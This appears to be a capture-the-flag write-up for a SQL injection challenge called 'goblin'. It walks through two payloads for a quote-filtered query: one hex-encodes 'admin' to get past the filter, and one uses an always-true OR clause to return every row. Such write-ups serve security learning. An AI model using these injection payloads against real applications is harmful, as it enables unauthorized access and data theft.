goblin
We are provided with the SQL query:
SELECT id FROM prob_goblin WHERE id='guest' AND no={$_GET[no]}
This time the application blocks quotation marks. It also does not directly insert user input into the id field.
The code also performs two conditional checks:
if($result['id']): It checks if the statement isTrue. If yes, it prints the following message:Hello {$result[id]}.if($result['id'] == 'admin'): It then checks if theidis set toadmin. If yes, it prints the flag.
We want the second conditional statement to be executed.
There are two methods.
Method 1
In order to make the result of the first query False, we can provide the following URI parameter:
?no=0
The resultant query then becomes:
SELECT id FROM prob_goblin WHERE id='guest' AND no=0
Since no=0 is always false, the result of the AND operation will always be False.
As expected, the Hello {$result[id]} message isn't printed.
In order to execute the second conditional statement, we can provide the following URI parameter:
?no=0 OR id=0x61646d696e
We are providing the Hexadecimal representation of the admin string.
The resultant query will be:
SELECT id FROM prob_goblin WHERE id='guest' AND no=0 OR id=0x61646d696e
The result of the first conditional is already False and because we just the id field to admin, the flag will be printed.
Method 2
If we provide the following URI parameter:
?no=no
The resultant query will be:
SELECT id FROM prob_goblin WHERE id='guest' AND no=no
The result will always be True since any column (no) compared with itself is always true.
Next, if we add an OR command as follows:
?no=no OR 1=1 ORDER BY id;
The resultant query will be:
SELECT id FROM prob_goblin WHERE id='guest' AND no=no OR 1=1 ORDER BY id;
This will print out all the rows as 1=1 is always true and anything OR with true is true.